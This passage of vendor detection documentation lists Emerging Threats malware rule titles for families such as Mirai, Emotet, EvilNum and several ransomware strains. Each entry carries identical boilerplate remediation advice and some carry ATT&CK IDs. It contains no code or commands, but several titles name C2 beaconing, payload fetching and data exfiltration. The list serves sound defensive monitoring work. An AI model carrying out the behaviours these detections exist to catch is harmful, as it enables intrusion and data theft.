Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Chacha.DDoS/Xor.DDoS Stage 2 CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/DarkNexus User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Kinsing Payload Request M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Kinsing Payload Request M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/LiLocked Ransom Note in HTTP Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/MachO.Netwire Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mayhem Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Miner Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Miner Loader Activity M1 (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Miner Loader Activity M2 (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai User-Agent Observed (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Cakle)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Damien)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Hentai)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (lessie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (muhstik)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Rift)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Shaolin)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Solar)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Tsunami)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Yakuza)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Yowai)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Cakle)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Damien)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Hentai)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (lessie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (muhstik)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Ouija_x.86)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (ph0ne)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Rift)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Shaolin)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Solar)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Tsunami)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Yakuza)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Yowai)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/muBoT User-Agent (I’m a mu mu mu ?)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Muhstik Attempting to Download Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Muhstik Bot Reporting Vulnerable Server to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Muhstik Scanner Module Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/RedXOR CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/RedXOR CnC Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Roboto - Possible Encrypted Roboto P2P Payload Requested M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Roboto - Possible Encrypted Roboto P2P Payload Requested M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/TooEasy Miner CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Win32 Lucky Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE ELF/Win32 Lucky Ransomware Encryption Process Started

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE EMAIL SSL Cert APT1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Emotet Certificate Observed M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Emotet Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Emotet CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Emotet CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Emotet Post Drop C2 Comms M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Emotet v2 Exfiltrating Outlook information

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Emotet Wifi Bruter Module Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Enfal CnC GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Enfal CnC POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Enigma Locker Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [eSentire] Cobalt Strike Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [eSentire] VBS Retrieving Malicious Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE ESPecter Bootkit Initialization Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ETag HTTP Header Observed at CNCERT Sinkhole

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ETag HTTP Header Observed at JPCERT Sinkhole

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EtumBot Ping

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EtumBot Registration Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EUPUDS.A Requests for Boleto replacement

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evil Google Drive Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evil Monero Cryptocurrency Miner Request Pools

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evilnum Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Checkin Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Client Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Client Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Client Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EVILNUM CnC Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Error Report

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EVILNUM CnC Host Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EVILNUM CnC Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evil PDF Retrieving Emotet Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evrial Stealer CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evrial Stealer CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evrial Stealer Retrieving CnC Information

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Executable Download Purporting to be JavaScript likely 2nd stage Infection

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EXE Download When Server Claims To Send Audio File - Must Be Win32

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Exorcist 2.0 Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE FaceBook IM & Web Driven Facebook Trojan Posting Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FAKBEN Ransomware

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE FAKE AOL SSL Cert APT1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV Check-in purporting to be MSIE with invalid terse HTTP headers

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

